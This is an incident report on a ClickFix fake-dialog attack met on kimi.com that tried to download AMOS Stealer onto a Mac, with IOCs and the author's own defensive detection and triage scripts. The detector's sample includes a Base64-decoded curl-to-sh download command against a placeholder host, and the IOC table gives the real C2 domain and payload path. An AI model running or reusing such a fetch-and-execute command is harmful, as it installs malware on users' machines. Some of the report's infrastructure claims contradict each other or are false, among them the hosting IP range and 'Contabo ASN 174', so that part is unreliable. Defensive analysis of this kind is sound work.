A comprehensive investigation into a social engineering attack discovered on kimi.com (Moonshot AI), where a ClickFix campaign attempted to deliver the AMOS (Atomic macOS Stealer) malware through fake system dialog overlays. This report documents the attack chain, infrastructure analysis, and multinational threat actor connections.
On February 24, 2026, during routine use of kimi.com — an AI assistant platform operated by Moonshot AI (China) — a social engineering attack was encountered and the malicious command was executed. The attack used the "ClickFix" technique: a fake macOS system dialog overlay that instructed the user to copy and execute a terminal command.
The command was executed in macOS Terminal and attempted to download the AMOS (Atomic macOS Stealer) malware from a command-and-control server proxied through Cloudflare CDN. The connection failed at the TLS/SSL handshake stage (curl: (35) Send failure: Broken pipe) — 0 bytes of payload were transferred, and no malicious code was executed. DNS resolution did occur, meaning the system briefly contacted the C2 infrastructure. A comprehensive security assessment confirmed no indicators of compromise on the system.
Key Finding: This investigation revealed a multinational cybercrime operation spanning three countries — a Chinese AI platform (delivery vector), Brazilian hosting infrastructure (command & control), and Russian-origin malware (AMOS Stealer). The download attempt was unsuccessful based on available evidence, but the sophistication of the attack chain warranted full documentation and federal reporting.
The attack followed a well-documented ClickFix social engineering pattern, adapted specifically for macOS users visiting AI platforms.
The command injected via the ClickFix overlay followed a standard two-stage pattern — a Base64-encoded URL decoded at runtime to obscure the true destination:
ClickFix is a social engineering technique that has gained significant traction since 2024. It presents users with fake browser or system error messages that instruct them to "fix" an issue by copying a command and pasting it into their terminal. The technique exploits user trust in system dialogs and the natural desire to resolve apparent errors.
In this instance, the fake dialog was designed to mimic a macOS system prompt, appearing while the user was interacting with kimi.com's AI assistant interface. The overlay was visually convincing and presented an urgent-seeming system notification.
AMOS is a Russian-origin information-stealing malware specifically designed for macOS systems. First observed in early 2023, it is sold as Malware-as-a-Service (MaaS) on Russian-language Telegram channels. Its capabilities include stealing browser credentials and cookies, cryptocurrency wallet data, Keychain passwords, and system information.
The command used Base64 encoding to hide the true download URL from casual inspection. This is a common evasion technique that prevents URL-based detection by security tools scanning clipboard content or terminal input.
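The Base64 layer defeats naive string matching on the clipboard, but it is cheap to undo: a detector only has to find Base64-looking tokens, decode them, and then look at the decoded text alongside the raw command. The following Python script is an added example written for this report, not code from the campaign or from any vendor; it classifies a pasted command by decoding embedded Base64, extracting any URL and hostname, and checking for the fetch-and-execute shape (curl/wget piped into a shell). The sample command and its URL are constructed placeholders, not the real endpoint.

```python
import base64
import binascii
import re
import string
from urllib.parse import urlparse

# Constructed sample of the two-stage pattern: the download URL is Base64-encoded
# in the pasted command and only decoded at runtime. Placeholder URL, not the
# campaign endpoint from the report.
SAMPLE_URL = "https://c2.example.invalid/curl/" + "0123456789abcdef" * 4
SAMPLE_B64 = base64.b64encode(SAMPLE_URL.encode()).decode()
SAMPLE_COMMAND = f'echo "{SAMPLE_B64}" | base64 -d | xargs curl -fsSL | sh'

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL_RE = re.compile(r"https?://[^\s\"'|)<>]+")
FETCH_RE = re.compile(r"\b(?:curl|wget)\b")
# "... | sh", "bash -c ..." or eval: the output of a fetch is handed to a shell.
EXEC_RE = re.compile(r"\|\s*(?:sudo\s+)?(?:sh|bash|zsh)\b|\b(?:sh|bash|zsh)\s+-c\b|\beval\b")
# macOS base64 accepts -d and the older -D; GNU also accepts --decode.
DECODE_RE = re.compile(r"base64\s+(?:-d|-D|--decode)\b")


def decode_base64_tokens(text):
    """Return printable ASCII strings hidden in Base64-looking tokens of `text`."""
    found = []
    for token in B64_TOKEN.findall(text):
        padded = token + "=" * (-len(token) % 4)  # tolerate stripped padding
        try:
            raw = base64.b64decode(padded, validate=True)
            decoded = raw.decode("ascii")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue  # a long plain word that is not valid Base64
        if decoded and all(c in string.printable for c in decoded):
            found.append(decoded)
    return found


def analyze_command(text):
    """Classify a clipboard/terminal command the way a ClickFix detector would."""
    decoded = decode_base64_tokens(text)
    combined = text + "\n" + "\n".join(decoded)  # inspect raw and decoded text together
    urls = URL_RE.findall(combined)
    domains = sorted({urlparse(u).hostname for u in urls if urlparse(u).hostname})
    fetch_and_execute = bool(FETCH_RE.search(combined) and EXEC_RE.search(combined))
    obfuscated = bool(DECODE_RE.search(text) or any(URL_RE.search(d) for d in decoded))
    if fetch_and_execute:
        verdict = "block"
    elif obfuscated or urls:
        verdict = "review"
    else:
        verdict = "allow"
    return {
        "decoded": decoded,
        "urls": urls,
        "domains": domains,
        "fetch_and_execute": fetch_and_execute,
        "obfuscated": obfuscated,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for cmd in (SAMPLE_COMMAND, "ls -la ~/Downloads"):
        result = analyze_command(cmd)
        print(result["verdict"], result["domains"], "<-", cmd[:50])
```

The decoded hostname is what you feed into a blocklist or a DNS alert; the verdict logic deliberately treats any fetch piped into a shell as blocking regardless of encoding, so a variant that drops the Base64 layer is still caught.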
The C2 server was hosted at contatoplus.com, resolving to IP addresses in the 191.101.236.x range. This infrastructure is operated by Contabo GmbH (ASN 174), a German-based hosting provider known for affordable VPS services frequently exploited by threat actors due to minimal verification requirements.
Infrastructure Note: Contabo (ASN 174) has been flagged in multiple threat intelligence reports as a hosting provider commonly used for malicious infrastructure due to lenient customer verification. The Brazilian IP allocation suggests the VPS was provisioned through Contabo's South American presence.
The payload URL path /new/data/bpa/new/data.txt follows patterns commonly seen in AMOS campaigns — generic directory names designed to look innocuous in server logs. The .txt extension masks what would likely be a shell script or binary payload.
This attack chain spans three countries, indicating either a coordinated multinational operation or a supply-chain compromise where multiple independent actors each contributed a component:
This multinational structure complicates law enforcement response, as jurisdiction spans multiple legal systems. The use of a legitimate AI platform as a delivery mechanism represents an evolution of the ClickFix technique from targeting generic web services to exploiting emerging AI platforms where users may be less security-conscious.
| Type | Indicator | Context |
|---|---|---|
| Domain | contatoplus.com | C2 server hosting AMOS payload |
| IP | 172.67.156.82 | Cloudflare CDN IP resolving for contatoplus.com |
| IP | 104.21.32.228 | Cloudflare CDN IP resolving for contatoplus.com |
| URL | contatoplus.com/curl/82c4a791ffa923f261773431b93efe388f18bd3a3866183a092eadc88146d77a | Payload download endpoint (hex = campaign/victim ID) |
| Base64 | aHR0cHM6Ly9jb250YXRvcGx1cy5jb20vY3VybC84MmM0YTc5MWZmYTkyM2Yy... | Encoded C2 URL delivered via clipboard hijack |
| Domain | kimi.com | Delivery platform (ClickFix overlay source) |
| CDN | Cloudflare (ASN 13335) | C2 domain proxied through Cloudflare CDN |
| Error | curl: (35) Send failure: Broken pipe | TLS handshake failed — payload not delivered |
| Malware | AMOS / Atomic macOS Stealer | Intended payload (Russian-origin MaaS) |
| Technique | ClickFix / Fake Dialog | Social engineering overlay on AI platform |
The malicious curl command was executed in Terminal. The command attempted to connect to contatoplus.com but failed with a TLS handshake error (curl: (35) Send failure: Broken pipe). While 0 bytes of payload were transferred, DNS resolution did occur, meaning the system briefly contacted the C2 domain's infrastructure. A comprehensive security assessment was then conducted. Note: This was a security scan/assessment, not a formal forensic investigation by a certified examiner.
⚠ Command Execution Evidence: The Base64-decoded curl command was executed in macOS Terminal. The TLS/SSL connection failed before any data transfer (broken pipe at handshake). DNS resolution occurred — the machine contacted Cloudflare's CDN IPs (172.67.156.82 / 104.21.32.228) but no payload was downloaded or executed.
Assessment Conclusion: The curl command was executed in Terminal but the connection failed at the TLS handshake stage (error 35: broken pipe). Zero bytes of payload were transferred. DNS resolution to the C2 domain did occur (IPs 172.67.156.82, 104.21.32.228 — Cloudflare CDN), meaning the C2 operator may have logged the source IP. Extended security checks confirmed: System Integrity Protection enabled, Gatekeeper active, no AMOS .helper binary, no unauthorized LaunchAgents, no suspicious processes, no active C2 connections, SSH keys and Chrome credentials untouched (modification dates predate incident), no cryptocurrency wallets present. Passwords changed and 2FA reviewed as precautionary measures.
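The checks listed in the assessment conclusion (SIP and Gatekeeper state, active connections to the C2 infrastructure, the AMOS .helper artifact) can be scripted so they are repeatable against the IOC table above. The Python script below is an added example for this report, not the author's assessment tooling; it parses constructed samples of `lsof -i -n -P`, `csrutil status` and `spctl --status` output and a list of file paths, and matches them against the domain and Cloudflare IPs from the IOC table. The lsof sample uses documentation address ranges apart from the IOC IP itself, and the file paths are made up.

```python
import re

# Indicators taken from the report's IOC table.
IOC_DOMAINS = {"contatoplus.com"}
IOC_IPS = {"172.67.156.82", "104.21.32.228"}

# Constructed sample of `lsof -i -n -P` output: one curl process mid-handshake to the
# IOC IP, one ordinary browser connection, one listener without a peer.
LSOF_SAMPLE = """\
COMMAND   PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
curl    41233 user    5u  IPv4 0x1a2b      0t0  TCP 198.51.100.20:52144->172.67.156.82:443 (SYN_SENT)
Safari    812 user   23u  IPv4 0x3c4d      0t0  TCP 198.51.100.20:52101->203.0.113.7:443 (ESTABLISHED)
mDNSResp  310 _mdns   9u  IPv4 0x5e6f      0t0  UDP *:5353
"""
CSRUTIL_SAMPLE = "System Integrity Protection status: enabled."
SPCTL_SAMPLE = "assessments enabled"
# Constructed file listing; the ".helper" entry is the artifact name the report checked for.
FILE_SAMPLE = [
    "/Users/user/Library/LaunchAgents/com.example.updater.plist",
    "/Users/user/.helper",
    "/Applications/Safari.app",
]

LSOF_RE = re.compile(
    r"^(?P<command>\S+)\s+(?P<pid>\d+)\s+\S+\s+\S+\s+IPv[46]\s+\S+\s+\S+\s+"
    r"(?P<proto>TCP|UDP)\s+(?P<local>\S+)->(?P<rhost>.+?):(?P<rport>\d+)"
    r"(?:\s+\((?P<state>\w+)\))?"
)


def parse_lsof(text):
    """Return one dict per connection line that has a remote peer."""
    return [m.groupdict() for m in map(LSOF_RE.match, text.splitlines()) if m]


def match_connection_iocs(conns):
    """Connections whose remote host is an IOC IP or (without -n) an IOC domain."""
    return [c for c in conns if c["rhost"] in IOC_IPS or c["rhost"] in IOC_DOMAINS]


def parse_protection_status(csrutil_out, spctl_out):
    """Interpret `csrutil status` and `spctl --status` output."""
    return {
        "sip_enabled": "status: enabled" in csrutil_out.lower(),
        "gatekeeper_enabled": "assessments enabled" in spctl_out.lower(),
    }


def find_helper_artifacts(paths):
    """Paths whose basename is '.helper' or ends in '.helper'."""
    return [p for p in paths if p.rsplit("/", 1)[-1].lower().endswith(".helper")]


def triage(lsof_text, csrutil_out, spctl_out, paths):
    """Combine the checks into one result; 'clean' requires every check to pass."""
    result = parse_protection_status(csrutil_out, spctl_out)
    result["ioc_connections"] = match_connection_iocs(parse_lsof(lsof_text))
    result["helper_artifacts"] = find_helper_artifacts(paths)
    result["clean"] = (
        result["sip_enabled"]
        and result["gatekeeper_enabled"]
        and not result["ioc_connections"]
        and not result["helper_artifacts"]
    )
    return result


if __name__ == "__main__":
    r = triage(LSOF_SAMPLE, CSRUTIL_SAMPLE, SPCTL_SAMPLE, FILE_SAMPLE)
    for c in r["ioc_connections"]:
        print(f"IOC connection: {c['command']} pid={c['pid']} -> {c['rhost']}:{c['rport']} {c['state']}")
    print("helper artifacts:", r["helper_artifacts"])
    print("clean:", r["clean"])
```

On a real host the three inputs come from running the commands and walking the home directory; keeping the parsing separate from command execution is what makes the logic testable offline and reusable against saved output from another machine.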
Filed formal internet crime complaint documenting the multinational malware distribution operation.
Consumer fraud report filed regarding deceptive malware distribution via a legitimate-appearing AI platform.
Cybersecurity incident report with full IOCs, MITRE ATT&CK mapping, and infrastructure analysis.
Submitted malware distribution report for both the delivery domain and C2 domain.
Reported contatoplus.com C2 domain for hosting malware distribution infrastructure behind Cloudflare CDN proxy. Requested service suspension.
Notified Anthropic about ClickFix campaigns targeting AI platform users, with recommendation for user education and platform hardening guidance.
Post-incident investigation of the contatoplus.com command-and-control domain revealed its role in a broader AMOS Stealer distribution network.
| Attribute | Value | Significance |
|---|---|---|
| Domain | contatoplus.com | C2 server — "contato" is Portuguese for "contact," suggesting Brazilian origin |
| CDN | Cloudflare (ASN 13335) | Proxied through Cloudflare to hide true origin IP and gain DDoS protection |
| IP (A Record) | 172.67.156.82 | Cloudflare anycast — true server IP hidden behind proxy |
| IP (A Record) | 104.21.32.228 | Cloudflare anycast — redundant CDN endpoint |
| Reverse DNS | None | No PTR record — common for malicious infrastructure |
| URL Path | /curl/82c4a791ff... | 64-char hex string = likely campaign or victim tracking identifier |
| Related Intel | Pulsedive flagged | Related Brazilian domains found in threat intelligence databases |
This C2 domain matches the documented AMOS Stealer ClickFix campaign pipeline reported by multiple security research teams in 2024–2025:
Why the Payload Failed: curl error 35 indicates a TLS/SSL handshake failure — the connection was reset (broken pipe) during the SSL negotiation phase. This could mean: (1) the C2 server was down or rate-limiting, (2) Cloudflare blocked the request, or (3) the server rejected the connection based on geographic or fingerprint filtering. Regardless, no data was transferred and no malicious code was executed on the system.